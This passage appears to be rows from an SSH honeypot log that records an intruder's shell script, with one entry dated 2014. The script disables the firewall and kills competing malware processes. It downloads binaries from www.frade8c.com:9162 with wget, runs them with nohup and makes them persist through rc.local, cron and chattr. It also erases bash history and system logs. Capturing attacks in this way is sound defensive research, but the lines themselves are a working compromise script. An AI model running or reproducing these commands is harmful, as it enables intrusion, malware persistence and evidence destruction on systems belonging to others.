660 | cd /tmp;chmod 7777 gfhjrtfyhuf | |
661 | cd /tmp;chmod 7777 rewgtf3er4t | |
662 | cd /tmp;chmod 7777 fdsfsfvff | |
663 | cd /tmp;chmod 7777 smarvtd | |
664 | cd /tmp;chmod 7777 whitptabil | |
665 | cd /tmp;chmod 7777 gdmorpen | |
666 | cd /tmp;./jdhe | |
667 | nohup /etc/sfewfesfs > /dev/null 2>&1& | |
668 | nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& | |
669 | nohup /etc/rewgtf3er4t > /dev/null 2>&1& | |
670 | nohup /etc/fdsfsfvff > /dev/null 2>&1& | |
671 | nohup /etc/smarvtd > /dev/null 2>&1& | |
672 | nohup /etc/whitptabil > /dev/null 2>&1& | |
673 | nohup /etc/gdmorpen > /dev/null 2>&1& | |
674 | nohup /etc/nhgbhhj > /dev/null 2>&1& | |
675 | nohup /etc/byv832 > /dev/null 2>&1& | |
676 | nohup /tmp/sfewfesfs > /dev/null 2>&1& | |
677 | nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& | |
678 | nohup /tmp/rewgtf3er4t > /dev/null 2>&1& | |
679 | nohup /tmp/fdsfsfvff > /dev/null 2>&1& | |
680 | nohup /tmp/smarvtd > /dev/null 2>&1& | |
681 | nohup /tmp/whitptabil > /dev/null 2>&1& | |
682 | nohup /tmp/gdmorpen > /dev/null 2>&1& | |
683 | nohup /tmp/nhgbhhj > /dev/null 2>&1& | |
684 | nohup /tmp/byv832 > /dev/null 2>&1& | |
685 | echo "cd /tmp;./sfewfesfs" >> /etc/rc.local | |
686 | echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local | |
687 | echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local | |
688 | echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local | |
689 | echo "cd /tmp;./smarvtd" >> /etc/rc.local | |
690 | echo "cd /tmp;./whitptabil" >> /etc/rc.local | |
691 | echo "cd /tmp;./gdmorpen" >> /etc/rc.local | |
692 | echo "cd /etc;./sfewfesfs" >> /etc/rc.local | |
693 | echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local | |
694 | echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local | |
695 | echo "cd /etc;./fdsfsfvff" >> /etc/rc.local | |
696 | echo "cd /etc;./smarvtd" >> /etc/rc.local | |
697 | echo "cd /etc;./whitptabil" >> /etc/rc.local | |
698 | echo "cd /etc;./gdmorpen" >> /etc/rc.local | |
699 | echo "unset MAILCHECK" >> /etc/profile | |
700 | cd /etc;chattr +i sfewfesfs | |
701 | rm -rf /root/.bash_history | |
702 | touch /root/.bash_history | |
703 | history -r | |
704 | cd /var/log > dmesg | |
705 | cd /var/log > auth.log | |
706 | cd /var/log > alternatives.log | |
707 | cd /var/log > boot.log | |
708 | cd /var/log > btmp | |
709 | cd /var/log > cron | |
710 | cd /var/log > cups | |
711 | cd /var/log > daemon.log | |
712 | cd /var/log > dpkg.log | |
713 | cd /var/log > faillog | |
714 | cd /var/log > kern.log | |
715 | cd /var/log > lastlog | |
716 | cd /var/log > maillog | |
717 | cd /var/log > user.log | |
718 | cd /var/log > Xorg.x.log | |
719 | cd /var/log > anaconda.log | |
720 | cd /var/log > yum.log | |
721 | cd /var/log > secure | |
722 | cd /var/log > wtmp | |
723 | cd /var/log > utmp | |
724 | cd /var/log > messages | |
725 | cd /var/log > spooler | |
726 | cd /var/log > sudolog | |
727 | cd /var/log > aculog | |
728 | cd /var/log > access-log | |
729 | cd /root > .bash_history | |
730 | history -c" | |
731 | 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] CMD: /etc/init.d/iptables stop | |
732 | echo "nameserver 8.8.8.8" >> /etc/resolv.conf | |
733 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf | |
734 | apt-get -y install wget | |
735 | yum -y install wget | |
736 | chmod 7777 / etc | |
737 | killall -9 .IptabLes | |
738 | killall -9 nfsd4 | |
739 | killall -9 profild.key | |
740 | cd /etc;rm -rf dir fake.cfg | |
741 | killall -9 nfsd | |
742 | killall -9 DDosl | |
743 | killall -9 lengchao32 | |
744 | killall -9 b26 | |
745 | killall -9 khelper | |
746 | killall -9 Bill | |
747 | killall -9 n26 | |
748 | killall -9 007 | |
749 | killall -9 codelove | |
750 | killall -9 32 | |
751 | killall -9 m32 | |
752 | killall -9 m64 | |
753 | killall -9 64 | |
754 | killall -9 83BOT | |
755 | killall -9 82BOT | |
756 | killall -9 dos64 | |
757 | killall -9 dos32 | |
758 | killall -9 new6 | |
759 | killall -9 new4 | |
760 | killall -9 node24 | |
761 | killall -9 mimi | |
762 | killall -9 nodeJR-1 | |
763 | killall -9 freeBSD | |
764 | killall -9 ksapdd | |
765 | killall -9 106 | |
766 | killall -9 09 | |
767 | killall -9 xsw | |
768 | killall -9 syslogd | |
769 | killall -9 skysapdd | |
770 | killall -9 cupsddd | |
771 | killall -9 ksapd | |
772 | killall -9 atddd | |
773 | killall -9 xfsdxd | |
774 | killall -9 sfewfesfs | |
775 | killall -9 gfhjrtfyhuf | |
776 | killall -9 rewgtf3er4t | |
777 | killall -9 fdsfsfvff | |
778 | killall -9 smarvtd | |
779 | killall -9 whitptabil | |
780 | killall -9 gdmorpen | |
781 | cd /etc;chattr -i 66 | |
782 | cd /root; chmod 7777 / etc | |
783 | killall -9 minerd | |
784 | killall -9 syn | |
785 | killall -9 joudckfr | |
786 | killall -9 www | |
787 | killall -9 log | |
788 | killall -9 .IptabLes | |
789 | killall -9 .IptabLex | |
790 | killall -9 .Mm2 | |
791 | killall -9 acpid | |
792 | killall -9 m64 | |
793 | killall -9 ./QQ | |
794 | killall -9 aabb | |
795 | killall -9 g3 | |
796 | killall -9 S99local | |
797 | killall -9 3 | |
798 | killall -9 pm | |
799 | killall -9 qweasd | |
800 | killall -9 tangtang | |
801 | killall -9 imap-login | |
802 | killall -9 xudp | |
803 | killall -9 sshpa | |
804 | killall -9 008 | |
805 | killall -9 txma | |
806 | killall -9 mrdos64.b00 | |
807 | killall -9 mrdos32.b00 | |
808 | killall -9 kkpklp | |
809 | killall -9 kiilp | |
810 | killall -9 xin1 | |
811 | killall -9 jibateng | |
812 | killall -9 syscore.sh | |
813 | killall -9 syscore.sh | |
814 | killall -9 syscore.sh | |
815 | killall -9 .mimeo | |
816 | killall -9 .mimeo | |
817 | killall -9 .mimeo | |
818 | killall -9 .mimeop | |
819 | killall -9 .task1 | |
820 | killall -9 .mimeop | |
821 | killall -9 .IptabLes | |
822 | killall -9 .IptabLex | |
823 | killall -9 .IptabLes | |
824 | killall -9 .IptabLex | |
825 | killall -9 .IptabLes | |
826 | killall -9 .IptabLex | |
827 | killall -9 .IptabLes | |
828 | killall -9 .IptabLex | |
829 | cd /root;rm -rf dir nohup.out | |
830 | cd /etc;rm -rf dir fake.cfg | |
831 | cd /etc;rm -rf dir cupsddd.* | |
832 | cd /etc;rm -rf dir atddd.* | |
833 | cd /etc;rm -rf dir ksapdd.* | |
834 | cd /etc;rm -rf dir kysapdd.* | |
835 | cd /etc;rm -rf dir sksapdd.* | |
836 | cd /etc;rm -rf dir skysapdd.* | |
837 | cd /etc;rm -rf dir xfsdxd.* | |
838 | cd /etc;rm -rf dir fake.cfg | |
839 | cd /etc;rm -rf dir cupsdd.* | |
840 | cd /etc;rm -rf dir atdd.* | |
841 | cd /etc;rm -rf dir ksapd.* | |
842 | cd /etc;rm -rf dir kysapd.* | |
843 | cd /etc;rm -rf dir sksapd.* | |
844 | cd /etc;rm -rf dir skysapd.* | |
845 | cd /etc;rm -rf dir xfsdx.* | |
846 | cd /etc;rm -rf dir sfewfesfs | |
847 | cd /etc;rm -rf dir gfhjrtfyhuf | |
848 | cd /etc;rm -rf dir rewgtf3er4t | |
849 | cd /etc;rm -rf dir fdsfsfvff | |
850 | cd /etc;rm -rf dir smarvtd | |
851 | cd /etc;rm -rf dir whitptabil | |
852 | cd /etc;rm -rf dir gdmorpen | |
853 | cd /etc;rm -rf dir sfewfesfs.* | |
854 | cd /etc;rm -rf dir gfhjrtfyhuf.* | |
855 | cd /etc;rm -rf dir rewgtf3er4t.* | |
856 | cd /etc;rm -rf dir fdsfsfvff.* | |
857 | cd /etc;rm -rf dir smarvtd.* | |
858 | cd /etc;rm -rf dir whitptabil.* | |
859 | cd /etc;rm -rf dir gdmorpen.* | |
860 | cd /etc;rm -rf dir nhgbhhj.* | |
861 | cd /tmp;rm -rf dir 1.* | |
862 | cd /tmp;rm -rf dir 2.* | |
863 | cd /tmp;rm -rf dir 3.* | |
864 | cd /tmp;rm -rf dir 4.* | |
865 | cd /tmp;rm -rf dir 5.* | |
866 | cd /tmp;rm -rf dir jdhe | |
867 | cd /tmp;rm -rf dir jdhe.* | |
868 | cd /var/spool/cron; rm -rf dir root.* | |
869 | cd /var/spool/cron; rm -rf dir root | |
870 | cd /var/spool/cron/crontabs; rm -rf dir root.* | |
871 | cd /var/spool/cron/crontabs; rm -rf dir root | |
872 | cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root | |
873 | cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root | |
874 | yes|mv /tmp/root /var/spool/cron | |
875 | yes|mv /tmp/root /var/spool/cron/crontabs | |
876 | cd /tmp;wget -c http://www.frade8c.com:9162/jdhe | |
877 | cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs | |
878 | cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf | |
879 | cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t | |
880 | cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff | |
881 | cd /etc;wget -c http://www.frade8c.com:9162/smarvtd | |
882 | cd /etc;wget -c http://www.frade8c.com:9162/whitptabil | |
883 | cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen | |
884 | cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj |